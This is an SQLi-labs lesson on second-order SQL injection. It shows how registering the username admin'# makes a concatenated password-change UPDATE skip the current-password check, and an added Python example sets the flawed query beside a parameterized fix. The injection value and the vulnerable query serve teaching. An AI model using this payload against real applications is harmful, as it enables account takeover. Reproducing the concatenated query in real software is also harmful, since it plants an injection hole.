SQLi-labs: Lesson 24

Second order SQL injection

Suppose you want to change admin’s password.

  1. Register a new user, using admin'# as the username.
  2. Log in as admin'# and change your password to, for example, 1234.
  3. The password-change query in the source code is:

    UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass'

    With the stored username admin'# inserted unescaped, the SQL query would be:

    UPDATE users SET PASSWORD='1234' where username='admin'#' and password='$curr_pass'

  4. Because # comments out the rest of the statement, the current-password check is never applied, and admin’s password is successfully changed.
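The query from step 3 next to a parameterized version, as an added example that is not part of the original lesson or the SQLi-labs source. It assumes an in-memory SQLite table standing in for the lab's MySQL database; the function names and the sample passwords are constructed for illustration.

```python
import sqlite3

# Constructed sample accounts mirroring the walkthrough (the lab stores plaintext passwords).
ADMIN, ATTACKER = "admin", "admin'#"

def vulnerable_query(new_pass, stored_username, curr_pass):
    """The 'before': the lab's UPDATE built by string concatenation."""
    return ("UPDATE users SET PASSWORD='%s' where username='%s' and password='%s'"
            % (new_pass, stored_username, curr_pass))

def effective_mysql_statement(sql):
    """Show what MySQL would run: an unquoted '#' comments out the rest of the line.
    Simplified quote tracking (no backslash escapes), enough for this query."""
    in_string = False
    for i, ch in enumerate(sql):
        if ch == "'":
            in_string = not in_string
        elif ch == "#" and not in_string:
            return sql[:i].rstrip()
    return sql

def change_password_safe(db, session_username, curr_pass, new_pass):
    """The 'after': every value, including the one read back from storage, is bound."""
    cur = db.execute(
        "UPDATE users SET password = ? WHERE username = ? AND password = ?",
        (new_pass, session_username, curr_pass))
    db.commit()
    return cur.rowcount

def demo():
    db = sqlite3.connect(":memory:")  # assumption: SQLite stands in for the lab's MySQL
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [(ADMIN, "admin-secret"), (ATTACKER, "attacker-pw")])
    rows = change_password_safe(db, ATTACKER, "attacker-pw", "1234")
    return rows, dict(db.execute("SELECT username, password FROM users"))

if __name__ == "__main__":
    q = vulnerable_query("1234", ATTACKER, "attacker-pw")
    print("concatenated:", q)
    print("MySQL runs:  ", effective_mysql_statement(q))
    print("parameterized:", demo())
```

With bound parameters the username admin'# is compared as a literal string, so only that account's row is updated and the current-password check still applies.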
